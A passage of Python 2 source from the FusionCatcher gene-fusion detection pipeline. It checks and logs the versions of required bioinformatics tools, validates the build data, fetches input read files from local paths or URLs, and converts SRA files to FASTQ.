    print >>sys.stderr,"ERROR: The build data was not found in '%s'!" % (data_dir,)
    print >>sys.stderr,"\n\n"
    sys.exit(1)

print "Checking FusionCatcher version..."
################################################################################
# Contacts the FusionCatcher server to check for a more recent version
################################################################################
old = []
if not options.skip_update_check:
    try:
        import socket
        import urllib2
        timeout = 10
        socket.setdefaulttimeout(timeout)
        #serverversion = urllib2.urlopen('http://fusioncatcher.hopto.org/fusioncatcher-version.txt').read()
        serverversion = None
        if serverversion:
            serverversion = serverversion.splitlines()
            serverversion = serverversion[0].strip()
            version = parser.get_version()
            if serverversion != version:
                old = ["",
                       "="*80,
                       "WARNING: This is an OLD version of FusionCatcher! There is a newer",
                       "         version available! Please, update to the newest version!",
                       "",
                       "   - Current version: %s" % (version.replace('fusioncatcher.py','').strip(),),
                       "   - New version:     %s" % (serverversion.replace('fusioncatcher.py','').strip(),),
                       "="*80,
                       ""
                      ]
                file(info_file,'a').writelines([el.rstrip('\r\n')+'\n' for el in old])
                print >>sys.stderr,'\n'.join(old)
    except:
        pass

################################################################################
# Initialize pipeline
################################################################################
import workflow

#
job = workflow.pipeline(
    log_filename = log_file,
    checksums_filename = options.checksums_filename,
    hash_library = options.hash,
    start_step = options.start_step)

##############################################################################
# SAVE EXTRA INFORMATION
##############################################################################

os.system("set +e") # make sure that the shell scripts are still executed even if there are errors

# save the version of FusionCatcher
job.add('printf',kind='program')
job.add(('"\n================================================\n'+
         'Software version: %s\n'+
         '================================================\n\n\n"') % (
         parser.get_version(),),kind='parameter')
job.add('>',info_file,kind='output')
job.run()

job.add('printf',kind='program')
job.add('"\nSoftware version: %s\n"' % (parser.get_version(),), kind='parameter')
job.add('>>',log_file,kind='output')
job.run()

# create the temporary directory
if job.run():
    if not os.path.isdir(tmp_dir) and not islink(tmp_dir):
        os.makedirs(tmp_dir)

# check options supported by the SORT command
sort_parallel = False
r = os.system("sort --help | grep 'parallel' > "+outdir('sort_help.txt'))
if (not r) and (not empty(outdir('sort_help.txt'))) and len(file(outdir('sort_help.txt'),'r').readlines()) == 1:
    sort_parallel = True
delete_file(outdir('sort_help.txt'))

# check options supported by the SORT command
sort_buffer = None
r = os.system("sort --help | grep 'buffer-size' > "+outdir('sort_help.txt'))
if (not r) and (not empty(outdir('sort_help.txt'))) and len(file(outdir('sort_help.txt'),'r').readlines()) == 1:
    if not is_optparse_provided(parser,'sort_buffer_size'):
        # here is the automatic setting
        mem = memory(unit="gb")
        mt = mem['total']
        if mt and mt > 33:
            sort_buffer = "26G"
        else:
            sort_buffer = options.sort_buffer_size #"80%"
    else:
        sort_buffer = options.sort_buffer_size #"80%"
delete_file(outdir('sort_help.txt'))

# check options supported by the SORT command
sort_lzop_compress = False
r = os.system("sort --help | grep 'compress-program' > "+outdir('sort_help.txt')+
              " ; lzop --help 2>/dev/null | grep -i 'compress' > "+outdir('lzop_help.txt'))
if (not r) and ((not empty(outdir('sort_help.txt'))) and len(file(outdir('sort_help.txt'),'r').readlines()) == 1 and
                (not empty(outdir('lzop_help.txt'))) and len(file(outdir('lzop_help.txt'),'r').readlines()) >= 1):
    sort_lzop_compress = True
delete_file(outdir('sort_help.txt'))
delete_file(outdir('lzop_help.txt'))

# check options supported by the SORT command
sort_gzip_compress = False
r = os.system("sort --help | grep 'compress-program' > "+outdir('sort_help.txt')+
              " ; gzip --help 2>/dev/null | grep -i 'compress' > "+outdir('gzip_help.txt'))
if (not r) and ((not empty(outdir('sort_help.txt'))) and len(file(outdir('sort_help.txt'),'r').readlines()) == 1 and
                (not empty(outdir('gzip_help.txt'))) and len(file(outdir('gzip_help.txt'),'r').readlines()) >= 1):
    sort_gzip_compress = True
delete_file(outdir('sort_help.txt'))
delete_file(outdir('gzip_help.txt'))

# disable any
compression done by SORT ===> FASTER sort_lzop_compress = False sort_gzip_compress = False # check if PIGZ is installed pigz = False r = os.system(_PZ_+"pigz --version 2>/dev/null") if (not r): pigz = True # check if PXZ is installed pxz = False r = os.system("pxz --version 2>/dev/null") if (not r): pxz = True # save version of ENSEMBL used to analyse this data info(job, fromfile = datadir('version.txt'), tofile = info_file, top = ["===================================", "GENOME INFORMATION:", "==================================="], bottom = "\n") # job.add('printf',kind='program') # job.add('"\n============\nGENOME:\n============\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',datadir('version.txt'),kind='input') # job.add('>>',info_file,kind='output') # job.run() # save the genome fasta files used info(job, fromfile = datadir('genome_information.txt'), tofile = info_file, top = ["===================================", "Genome FASTA files:", "==================================="], bottom = "\n\n\n") # job.add('printf',kind='program') # job.add('"\nGenome FASTA files:\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',datadir('genome_information.txt'),kind='input') # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() if not os.system("cat /etc/issue 2>&1 >/dev/null"): job.add('printf',kind='program') job.add('"\nLinux:\n------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('cat',kind='program') job.add('/etc/issue',kind='parameter') job.add('2>&1',kind='parameter') job.add('>>',info_file,kind='output') job.run() # save version of Python used to analyze this data job.add('printf',kind='program') job.add('"\nPython:\n------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add(_FC_+'python_version.py',kind='program') job.add('>>',info_file,kind='output') job.run(error_message=("Please, check if 'Python' (from "+ "<http://python.org/>) is installed (or if 'configuration.cfg' file "+ "is set up correctly)!")) # save version of BioPython used to analyze this data job.add('printf',kind='program') job.add('"\nBioPython:\n------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add(_FC_+'biopython_version.py',kind='program') job.add('>>',info_file,kind='output') job.run(error_message=("Please, check if 'BioPython' (from "+ "<http://biopython.org/>) is installed (or if 'configuration.cfg' file "+ "is set up correctly)!")) # save version of BOWTIE used to analyze this data job.add('printf',kind='program') job.add('"\n===========\nTOOLS:\n===========\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\nSORT:\n------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('sort',kind='program') job.add('--version',kind='parameter') job.add('|',kind='parameter') job.add('head','-1',kind='parameter') job.add('>>',info_file,kind='output') job.run() os.system(_BE_+"bowtie --version | head -1 > '%s'" % (outdir('bowtie_version.txt'),)) last_line = file(outdir('bowtie_version.txt'),'r').readline().lower().rstrip("\r\n") #correct_versions = set(['bowtie-align version 1.2.1','bowtie-align version 1.2.1.1','bowtie-align version 1.2','bowtie version 1.1.2']) correct_versions = set(['version 
1.2','version 1.1.2','version 1.2.2','version 1.2.3','version 1.3.0'])
bowtie121 = False
if last_line.find("1.2.") != -1:
    bowtie121 = True
bowtie123 = False
if (last_line.find("1.2.3") != -1) or (last_line.find("1.3.0") != -1) or (last_line.find("1.2.") != -1 and last_line.find("1.2.1") == -1 and last_line.find("1.2.2") == -1):
    # add here other newer versions of Bowtie
    bowtie123 = True # this version of Bowtie supports indexes from Bowtie2
if (last_line not in correct_versions) and not [1 for el in correct_versions if last_line.lower().endswith(el)]:
    print last_line
    job.close()
    os.system("which bowtie > '%s'" % (outdir('bowtie_path.txt'),))
    bowtie_path = file(outdir('bowtie_path.txt'),'r').readline().rstrip("\r\n")
    print >>sys.stderr,("\n\n\nERROR: Wrong version of BOWTIE found ("+bowtie_path+")! It should be: "+', '.join(sorted(correct_versions))+".")
    print >>sys.stderr,("\nERROR: One may specify the path to the correct version in 'fusioncatcher/etc/configuration.cfg',")
    print >>sys.stderr,("\nERROR: for example, by manually changing the line fusioncatcher/tools/bowtie to fusioncatcher/tools/bowtie-old")
    print >>sys.stderr,("\nERROR: It may also be that some of Bowtie's dependencies are missing.")
    print >>sys.stderr,("\nERROR: Therefore also make sure that Bowtie's dependencies are installed, for example:")
    print >>sys.stderr,("\nERROR: sudo apt-get install libtbb-dev libtbb2 libc6-dev")
    print >>sys.stderr,("\nERROR: or")
    print >>sys.stderr,("\nERROR: sudo yum install libtbb-devel libtbb2 libc6-devel")
    sys.exit(1)
os.remove(outdir('bowtie_version.txt'))

job.add('printf',kind='program')
job.add('"\nBOWTIE:\n------\n"',kind='parameter')
job.add('>>',info_file,kind='output')
job.run()

job.add(_BE_+'bowtie',kind='program')
job.add('--version',kind='parameter')
job.add('|',kind='parameter')
job.add('head','-2',kind='parameter')
job.add('>>',info_file,kind='output')
job.run(error_message=("Please, check if 'Bowtie' (from "+
    "<http://bowtie-bio.sourceforge.net/index.shtml>) is installed and it "+
    "is in the corresponding PATH!"))

job.add('printf',kind='program')
job.add('"\nBBMAP:\n------\n"',kind='parameter')
job.add('>>',info_file,kind='output')
job.run()

job.add(_BP_+'bbversion.sh',kind='program')
# job.add('--version',kind='parameter')
# job.add('2>>',info_file,kind='output')
job.add('>>',info_file,kind='output')
job.run(error_message=("Please, check if 'BBMAP' (from "+
    "<https://sourceforge.net/projects/bbmap>) is installed and it "+
    "is in the corresponding PATH!"))

# check version
os.system(_BP_+"bbversion.sh > '%s'" % (outdir('bbmap_version.txt'),))
last_line = file(outdir('bbmap_version.txt'),'r').readline().lower().rstrip("\r\n")
correct_version = ('38.44',)
if last_line not in correct_version:
    job.close()
    os.system("which bbversion.sh > '%s'" % (outdir('bbmap_path.txt'),))
    bbmap_path = file(outdir('bbmap_path.txt'),'r').readline().rstrip("\r\n")
    print >>sys.stderr,"\n\n\nERROR: Wrong version of BBMAP found ("+bbmap_path+")! Found '"+last_line+"'. It should be '"+', or'.join(correct_version)+"'. One may specify the path to the correct version in 'fusioncatcher/etc/configuration.cfg'.\n"
    sys.exit(1)
os.remove(outdir('bbmap_version.txt'))

job.add('printf',kind='program')
job.add('"\nPIGZ:\n------\n"',kind='parameter')
job.add('>>',info_file,kind='output')
job.run()

if pigz:
    job.add(_PZ_+'pigz',kind='program')
    job.add('--version',kind='parameter')
    #job.add('2>&1',kind='parameter')
    job.add('2>>',info_file,kind='output')
    job.run()

job.add('printf',kind='program')
job.add('"\nPXZ:\n------\n"',kind='parameter')
job.add('>>',info_file,kind='output')
job.run()

if pxz:
    job.add('pxz',kind='program')
    job.add('--version',kind='parameter')
    job.add('2>&1',kind='parameter')
    job.add('>>',info_file,kind='output')
    job.run()

job.add('printf',kind='program')
job.add('"\nfastq-dump (from SRA Toolkit):\n--------------\n"',kind='parameter')
job.add('>>',info_file,kind='output')
job.run()

if not os.system("which fastq-dump 2>&1 >/dev/null"):
    job.add(_SA_+'fastq-dump',kind='program')
    job.add('2>&1',kind='parameter')
    job.add('|',kind='parameter')
    job.add('tail','-2',kind='parameter')
    job.add('|',kind='parameter')
    job.add('head','-1',kind='parameter')
    job.add('>>',info_file,kind='output')
    job.run()

job.add('printf',kind='program')
job.add('"\nGNU Parallel:\n--------------\n"',kind='parameter')
job.add('>>',info_file,kind='output')
job.run()

if not os.system("which parallel 2>&1 >/dev/null"):
    job.add(_PL_+'parallel',kind='program')
    job.add('--version',kind='parameter')
    job.add('2>&1',kind='parameter')
    job.add('|',kind='parameter')
    job.add('head','-1',kind='parameter')
    job.add('>>',info_file,kind='output')
    job.run()

parsort = False
parsort_buffer_size = ""
if options.processes > 3 and (not options.skip_parsort) and (not os.system("which parsort 2>&1 >/dev/null")):
    #parsort = True # not worth it; faster by only a few seconds
    parsort = False
    vux = int(float(80) / float(options.processes)) # 80 because at most 80% of the RAM should be used
    if total_memory and float(total_memory) * float(vux)/float(100) > 6000 and sort_parallel:
        parsort_buffer_size = str(vux)+"%"

job.add('printf',kind='program')
job.add('"\nSAMTools:\n---------\n"',kind='parameter')
job.add('>>',info_file,kind='output')
job.run()

if not os.system("which samtools 2>&1 >/dev/null"):
    job.add(_SS_+'samtools',kind='program')
    job.add('2>&1',kind='parameter')
    job.add('|',kind='parameter')
    job.add('head','-3',kind='parameter')
    job.add('|',kind='parameter')
    job.add('tail','-1',kind='parameter')
    job.add('>>',info_file,kind='output')
    job.run()

job.add('printf',kind='program')
job.add('"\nJava:\n---------\n"',kind='parameter')
job.add('>>',info_file,kind='output')
job.run()

if not os.system("which java 2>&1 >/dev/null"):
    job.add('java',kind='program')
    job.add('--version',kind='parameter')
    job.add('2>&1',kind='parameter')
    job.add('|',kind='parameter')
    job.add('head','-1',kind='parameter')
    job.add('>>',info_file,kind='output')
    job.run()

job.add('printf',kind='program')
job.add('"\nliftOver:\n---------\n"',kind='parameter')
job.add('>>',info_file,kind='output')
job.run()

if not os.system("which liftOver 2>&1 >/dev/null"):
    job.add(_LR_+'liftOver',kind='program')
    job.add('2>&1',kind='parameter')
    job.add('|',kind='parameter')
    job.add('head','-1',kind='parameter')
    job.add('>>',info_file,kind='output')
    job.run()
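# Note: the tool checks below (SeqTK, fastqtk, and earlier Bowtie/BBMap/STAR)
# follow one recurring pattern: run the tool, capture its version line into a
# small file under the output directory, compare it against a pinned tuple of
# accepted strings, and on mismatch report the offending binary (found via
# `which`) before exiting. A minimal sketch of the pattern (file names are
# illustrative):
#
#   os.system("seqtk 2>&1 | head -3 | tail -1 > version.txt")
#   found = file("version.txt",'r').readline().lower().rstrip("\r\n")
#   if found not in correct_version:
#       sys.exit(1)  # the real code prints the path from `which` first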
job.add('printf',kind='program')
job.add('"\nSeqTK:\n---------\n"',kind='parameter')
job.add('>>',info_file,kind='output')
job.run()

job.add(_SK_+'seqtk',kind='program')
job.add('2>&1',kind='parameter')
job.add('|',kind='parameter')
job.add('head','-3',kind='parameter')
job.add('|',kind='parameter')
job.add('tail','-1',kind='parameter')
job.add('>>',info_file,kind='output')
job.run()

# check version
os.system(_SK_+"seqtk 2>&1 |head -3 |tail -1 > '%s'" % (outdir('seqtk_version.txt'),))
last_line = file(outdir('seqtk_version.txt'),'r').readline().lower().rstrip("\r\n")
# correct_version = ('version: 1.0-r68e-dirty','version: 1.0-r82b-dirty')
#correct_version = ('version: 1.0-r82b-dirty','version: 1.2-r101b-dirty','version: 1.2-r101c-dirty')
correct_version = ('version: 1.2-r101c-dirty',)
if last_line not in correct_version:
    job.close()
    os.system("which seqtk > '%s'" % (outdir('seqtk_path.txt'),))
    seqtk_path = file(outdir('seqtk_path.txt'),'r').readline().rstrip("\r\n")
    print >>sys.stderr,"\n\n\nERROR: Wrong version of SeqTK found ("+seqtk_path+")! Found '"+last_line+"'. It should be '"+', or'.join(correct_version)+"'. One may specify the path to the correct version in 'fusioncatcher/etc/configuration.cfg'.\n"
    sys.exit(1)
os.remove(outdir('seqtk_version.txt'))

job.add('printf',kind='program')
job.add('"\nfastqtk:\n---------\n"',kind='parameter')
job.add('>>',info_file,kind='output')
job.run()

job.add(_FK_+'fastqtk',kind='program')
job.add('2>&1',kind='parameter')
job.add('|',kind='parameter')
job.add('head','-3',kind='parameter')
job.add('|',kind='parameter')
job.add('tail','-1',kind='parameter')
job.add('>>',info_file,kind='output')
job.run()

# check version (note: use the fastqtk prefix _FK_ here, not the seqtk one)
os.system(_FK_+"fastqtk 2>&1 |head -3 |tail -1 > '%s'" % (outdir('fastqtk_version.txt'),))
last_line = file(outdir('fastqtk_version.txt'),'r').readline().lower().rstrip("\r\n")
correct_version = ('version: 0.27',)
if last_line not in correct_version:
    job.close()
    os.system("which fastqtk > '%s'" % (outdir('fastqtk_path.txt'),))
    fastqtk_path = file(outdir('fastqtk_path.txt'),'r').readline().rstrip("\r\n")
    print >>sys.stderr,"\n\n\nERROR: Wrong version of fastqtk found ("+fastqtk_path+")! Found '"+last_line+"'. It should be '"+', or'.join(correct_version)+"'.
One may specify the path to the correct version in 'fusioncatcher/etc/configuration.cfg'.\n" sys.exit(1) os.remove(outdir('fastqtk_version.txt')) job.add('printf',kind='program') job.add('"\nsed:\n---------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('sed',kind='program') job.add('--version',kind='parameter') job.add('2>&1',kind='parameter') job.add('|',kind='parameter') job.add('head','-1',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\nawk:\n---------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('awk',kind='program') job.add('-Wversion',kind='parameter') job.add('2>&1',kind='parameter') job.add('|',kind='parameter') job.add('head','-1',kind='parameter') job.add('>>',info_file,kind='output') job.add('||',kind='parameter') job.add('awk',kind='parameter') job.add('--version',kind='parameter') job.add('2>&1',kind='parameter') job.add('|',kind='parameter') job.add('head','-1',kind='parameter') job.add('>>',info_file,kind='output') job.run() if not options.skip_blat: # save version of BLAT used to analyze the data job.add('printf',kind='program') job.add('"\nBLAT:\n------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add(_BT_+'blat',kind='program') job.add('|',kind='parameter') job.add('head','-1',kind='parameter') job.add('>>',info_file,kind='output') job.run(error_message = ("Please, check if BLAT (from "+ "<http://users.soe.ucsc.edu/~kent/src/> and "+ "<http://hgdownload.cse.ucsc.edu/admin/exe/>) is installed correctly and it "+ "is in the corresponding PATH (or if 'configuration.cfg' file is "+ "set up correctly)!\n If there is no wish to use BLAT aligner then please "+ "(re)run FusionCatcher using command line option '--skip-blat'.\n"+ "Please, also read its commercial "+ "license <http://www.kentinformatics.com/> if this applies in your case!")) # save version of faToTwoBit from BLAT used to analyze the data job.add('printf',kind='program') job.add('"\nfaToTwoBit (from BLAT toolbox):\n----------------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add(_FT_+'faToTwoBit',kind='program') job.add('2>&1',kind='parameter') job.add('>','/dev/null',kind='parameter') job.add('|',kind='parameter') job.add('head','-1',kind='parameter') job.add('>>',info_file,kind='output') job.run(error_message = ("Please, check if faToTwoBit (from BLAT toolbox, here: "+ "<http://users.soe.ucsc.edu/~kent/src/> and "+ "<http://hgdownload.cse.ucsc.edu/admin/exe/>) is installed correctly and it "+ "is in the corresponding PATH (or if 'configuration.cfg' file is "+ "set up correctly)!\n If there is no wish to use BLAT aligner then please "+ "(re)run FusionCatcher using command line option '--skip-blat'.\n"+ "Please, also read its commercial "+ "license <http://www.kentinformatics.com/> if this applies in your case!")) star25 = False if not options.skip_star: # save version of BLAT used to analyze the data job.add('printf',kind='program') job.add('"\nSTAR:\n------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add(_SR_+'STAR',kind='program') job.add('--version',kind='parameter') job.add('>>',info_file,kind='output') job.run(error_message = ("Please, check if STAR (from "+ "<https://github.com/alexdobin/STAR> and "+ "<https://github.com/alexdobin/STAR/releases>) is installed correctly and it "+ "is in the corresponding PATH (or if 'configuration.cfg' file is "+ "set up correctly)!\n If there is no wish to use 
STAR aligner then please "+
        "(re)run FusionCatcher using command line option '--skip-star'."))

    os.system(_SR_+"STAR --version > '%s'" % (outdir('star_version.txt'),))
    last_line = file(outdir('star_version.txt'),'r').readline().lower().rstrip("\r\n")
    correct_version = '2.7.2b'
    #correct_version = '2.7.0f'
    #correct_version = 'star_2.5.4b'
    #correct_version = 'star_2.5.2b'
    #correct_version = 'star_2.5.2a'
    #correct_version = 'star_2.5.1b'
    #correct_version = 'star_2.4.2a'
    if not (correct_version.lower().startswith('star_2.1.') or
            correct_version.lower().startswith('star_2.2.') or
            correct_version.lower().startswith('star_2.3.') or
            correct_version.lower().startswith('star_2.4.')):
        star25 = True
    if last_line != correct_version:
        job.close()
        os.system("which STAR > '%s'" % (outdir('star_path.txt'),))
        star_path = file(outdir('star_path.txt'),'r').readline().rstrip("\r\n")
        print >>sys.stderr,"\n\n\nERROR: Wrong version of STAR found ("+star_path+")! It should be '"+correct_version+"'. One may specify the path to the correct version in 'fusioncatcher/etc/configuration.cfg'.\n"
        sys.exit(1)
    os.remove(outdir('star_version.txt'))

# save the version of BOWTIE2 used to analyze the data
job.add('printf',kind='program')
job.add('"\n\nBOWTIE2:\n------\n"',kind='parameter')
job.add('>>',info_file,kind='output')
job.run()

job.add(_B2_+'bowtie2',kind='program')
job.add('--version',kind='parameter')
job.add('2>&1',kind='parameter')
job.add('|',kind='parameter')
job.add('head','-2',kind='parameter')
job.add('>>',info_file,kind='output')
job.run(error_message = ("Please, check if BOWTIE2 (from "+
    "<http://bowtie-bio.sourceforge.net/bowtie2/index.shtml> "+
    "is installed correctly and it "+
    "is in the corresponding PATH (or if 'configuration.cfg' file is "+
    "set up correctly)!\n If there is no wish to use BOWTIE2 aligner then please "+
    "(re)run FusionCatcher using command line option '--skip-bowtie2'."))

# if not options.skip_bwa:
#     # save the version of BWA used to analyze the data
#     job.add('printf',kind='program')
#     job.add('"\n\nBWA:\n------\n"',kind='parameter')
#     job.add('>>',info_file,kind='output')
#     job.run()
#     job.add(_BA_+'bwa',kind='program')
#     job.add('2>&1',kind='parameter')
#     job.add('|',kind='parameter')
#     job.add('head','-3',kind='parameter')
#     job.add('|',kind='parameter')
#     job.add('tail','-1',kind='parameter')
#     job.add('>>',info_file,kind='output')
#     job.run(error_message = ("Please, check if BWA (from "+
#         "<http://bio-bwa.sourceforge.net/> "+
#         "is installed correctly and it "+
#         "is in the corresponding PATH (or if 'configuration.cfg' file is "+
#         "set up correctly)!\n If there is no wish to use BWA aligner then please "+
#         "(re)run FusionCatcher using command line option '--skip-bwa'."))

if options.assembly:
    # save the version of VELVET used to analyze the data
    job.add('printf',kind='program')
    job.add('"\nVELVET:\n------\n"',kind='parameter')
    job.add('>>',info_file,kind='output')
    job.run()

    job.add(_VT_+'velvetg',kind='program')
    job.add('|',kind='parameter')
    job.add('head','-2',kind='parameter')
    job.add('>>',info_file,kind='output')
    job.run(error_message = ("Please, check if VELVET (from "+
        "<http://www.ebi.ac.uk/~zerbino/velvet/>) "+
        "is installed and it "+
        "is in the corresponding PATH!"))

    job.add(_VT_+'velveth',kind='program')
    job.add('|',kind='parameter')
    job.add('head','-2',kind='parameter')
    job.add('>>',info_file,kind='output')
    job.run(error_message = ("Please, check if VELVET (from "+
        "<http://www.ebi.ac.uk/~zerbino/velvet/>) "+
        "is installed and it "+
        "is in the corresponding PATH!"))

# save the
command line arguments again job.add('printf',kind='program') job.add('"\n\n\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() if job.run(): clo = [ el + ' = ' + str(getattr(options,el))+'\n' for el in dir(options) if (not el.startswith('_')) and type(getattr(options,el)).__name__ in ('str','bool','int','float')] clo.append("main_script = " + expand(sys.argv[0])+'\n') clo.append("main_script_version = " + version.replace('%prog','').strip() +'\n') clo.insert(0,"Pipeline parameters:\n") clo.insert(1,"====================\n") clo.append("\n") clo.append("Current working directory:\n---------------------------\n%s\n" % (expand(os.getcwd()),)) clo.append("\n") clo.append("Command line used for launching FusionCatcher:\n") clo.append("----------------------------------------------\n") clo.append("%s\n" % (' \\ \n'.join(sys.argv),)) clo.append("----------------------------------------------\n") clo.append("\n\n\n") clo.append("Shebang for Python scripts:\n") clo.append("---------------------------\n") clo.append(file(expand(sys.argv[0]),'r').readline()+"\n") clo.append("\n\n\n") file(info_file,'a').writelines(clo) clo = [] clo.append("#!/usr/bin/env bash\n") clo.append("cd '%s'\n" % (os.getcwd(),)) clo.append("\n") clo.append("%s\n" % (' \\\n'.join(sys.argv),)) clo.append("\n") file(outdir('restart.sh'),'w').writelines(clo) os.system("chmod u+x '%s'" % (outdir('restart.sh'),)) info(job, fromfile = configfile, tofile = info_file, top = ["===================", "CONFIGURATION.CFG:", "==================="], bottom = "\n\n\n") if islink(data_dir): job.add('printf',kind='program') job.add('"\n============\nDATA DIRECTORY:\n============\n%s\nIt links to:\n%s\n\n\n"' % (data_dir,expand(os.readlink(data_dir[:-1] if data_dir.endswith(os.sep) else data_dir))),kind='parameter') job.add('>>',info_file,kind='output') job.run() else: job.add('printf',kind='program') job.add('"\n============\nDATA DIRECTORY:\n============\n%s\nIt is not a link!\n\n\n"' % (data_dir,),kind='parameter') job.add('>>',info_file,kind='output') job.run() if job.run(): # test that the version of build data matches build_version = file(datadir('version.txt'),'r').readline().strip() build_version = build_version.lower().split('.py') old_build_version = 'fusioncatcher-build.py 0.99.3d beta--------' old_build_version = old_build_version.lower().split('.py') pipeline_version = parser.get_version() pipeline_version = pipeline_version.lower().strip().split('.py') if len(pipeline_version) > 1 and len(build_version) > 1 and (build_version[1].strip() == pipeline_version[1].strip() or old_build_version[1].strip() == build_version[1].strip()): print "Version of the data build matches the version of pipeline version!" else: job.close() print >>sys.stderr,"...................." print >>sys.stderr,"ERROR: The version of the data build does not match the version of this pipeline!" print >>sys.stderr,"Please, run again the 'fusioncatcher-build.py' in order to fix this!" print >>sys.stderr,"...................." 
    sys.exit(1)

# find available memory
job.add('printf',kind='program')
job.add('"\n============\nMEMORY:\n============\n"',kind='parameter')
job.add('>>',info_file,kind='output')
job.run()

job.add('free',kind='program')
job.add('-m',kind='parameter')
job.add('>>',info_file,kind='output')
job.run()

job.add('printf',kind='program')
job.add('"\nTotal installed RAM memory = %d MB"' % (total_memory,),kind='parameter')
job.add('>>',info_file,kind='output')
job.run()

job.add('printf',kind='program')
job.add('"\n\n\n"',kind='parameter')
job.add('>>',info_file,kind='output')
job.run()

##############################################################################
# STARTING with the input
##############################################################################
if options.input_filename.endswith(','):
    job.close()
    print >>sys.stderr,"ERROR: The input list of files ends with a comma!"
    print >>sys.stderr,"Please, remove the comma from the end of the list of files"
    print >>sys.stderr,"or check that there are no blanks, tabs, or spaces after the comma"
    print >>sys.stderr,"and re-run FusionCatcher from the very beginning!"
    sys.exit(1)

list_input_files = sorted([expand(el.strip('"').strip("'")) if el.find('://') == -1 else el.strip('"').strip("'") for el in options.input_filename.split(',') if el])
f = []
urls = []
new_input_output = outdir('input/')
for element in list_input_files:
    if os.path.isdir(element):
        print "The input '%s' is a directory..." % (element,)
        f.extend([os.path.join(element,el) for el in os.listdir(element)])
    elif element.find('http://') != -1 or element.find('https://') != -1 or element.find('ftp://') != -1 or element.find('ssh://') != -1:
        if not os.path.isdir(new_input_output):
            os.makedirs(new_input_output)
        if element.find('ssh://') != -1:
            #scp -r user@your.server.example.com:/path/to/foo /home/user/Desktop/
            job.add('scp',kind='program')
            job.add('-r',kind='parameter')
            job.add('',element.replace('ssh://',''),kind='parameter')
            job.add('',new_input_output,kind='output')
            job.run()
        else:
            job.add('wget',kind='program')
            job.add('--no-check-certificate',kind='parameter')
            if element.endswith('/') or element.endswith(os.sep):
                job.add('-r',kind='parameter')
                job.add('-nd',kind='parameter')
                job.add('-np',kind='parameter')
                job.add('-A','fq,fastq,fq.gz,fastq.gz,fq.zip,fastq.zip,fq.gz,fastq.bz2,sra,fastq.xz,fq.xz',kind='parameter')
            job.add('',element,kind='parameter')
            job.add('-P',new_input_output,kind='output')
            job.run()
    else:
        f.append(element)

if os.path.isdir(new_input_output):
    urls1 = [os.path.join(new_input_output,el) for el in os.listdir(new_input_output) if os.path.isfile(os.path.join(new_input_output,el)) and not el.startswith('.')]
    f.extend(urls1)
    urls.extend(urls1)
    urls2 = [os.path.join(new_input_output,el) for el in os.listdir(new_input_output) if os.path.isdir(os.path.join(new_input_output,el)) and not el.startswith('.')]
    for elx in urls2:
        urls3 = [os.path.join(elx,el) for el in os.listdir(elx) if os.path.isfile(os.path.join(elx,el)) and not el.startswith('.')]
        f.extend(urls3)
        urls.extend(urls3)

list_input_files = [el for el in f if is_known_extension(el) and (not empty(el)) and (not el.startswith('.'))]
list_input_files = list(set(list_input_files))
list_input_files.sort()

job.write(["Input files (which contain the short reads):"]+list_input_files)
info(job,
     fromfile = None,
     tofile = info_file,
     top = ["",
            "Input files (which contain the short reads):",
            "--------------------------------------------"]+list_input_files,
     bottom = "\n\n\n",
     temp_path=temp_flag)

# job.add('printf',kind='program')
# job.add('"\n============\nInput files:\n============\n"',kind='parameter')
# job.add('>>',info_file,kind='output')
# job.run()
# for el in list_input_files:
#     job.add('printf',kind='program')
#     job.add('"%s\n"' % (el,),kind='parameter')
#     job.add('>>',info_file,kind='output')
#     job.run()
# job.add('printf',kind='program')
# job.add('"\n\n\n"',kind='parameter')
# job.add('>>',info_file,kind='output')
# job.run()

if len(list_input_files) < 1:
    job.close()
    print >>sys.stderr,"\n\n\nERROR: No valid input files have been found (given input is: '%s' )!\n" % (options.input_filename,)
    sys.exit(1)

# protect the input files from accidental deletion
job.protect(list_input_files)

# handle the SRA files
new_list_input_files = []
i = 0
for input_file in list_input_files:
    if input_file.endswith(".sra"):
        i = i + 1
        outfile1 = outdir(os.path.basename(input_file)[:-4]+'_1.fastq')
        outfile2 = outdir(os.path.basename(input_file)[:-4]+'_2.fastq')
        job.add(_SA_+'fastq-dump',kind='program')
        job.add('--split-files',kind='parameter')
        job.add('',input_file,kind='input')
        job.add('-O',out_dir,kind='output',checksum='no')
        job.add('',outfile1,kind='output',command_line='no')
        job.add('',outfile2,kind='output',command_line='no')
        if job.run(error_message=("Please, check if 'fastq-dump' (from NCBI SRA "+
                "Toolkit <http://www.ncbi.nlm.nih.gov/Traces/sra/?view=software>) "+
                "is installed and it is in the corresponding PATH!")):
            # test if there are indeed two output files
            if empty(outfile2):
                job.write("\n\n\nERROR: The SRA input file '%s' does not contain paired-end reads!\n\n\n" % (input_file,),stderr=True)
                job.close()
                sys.exit(1)
        outfile3 = outdir(os.path.basename(input_file)[:-4]+'_1.fq')
        outfile4 = outdir(os.path.basename(input_file)[:-4]+'_2.fq')
        job.add(_FC_+'sra2illumina.py',kind='program')
        #job.add('--tag_read_name','Z'+str(i)+'Z',kind='parameter')
        job.add('--input_1',outfile1,kind='input',temp_path=temp_flag)
        job.add('--input_2',outfile2,kind='input',temp_path=temp_flag)
        job.add('--output_1',outfile3,kind='output')
        job.add('--output_2',outfile4,kind='output')
        job.add('--link','change',kind='parameter')
        job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no')
        job.run()
        new_list_input_files.append(outfile3)
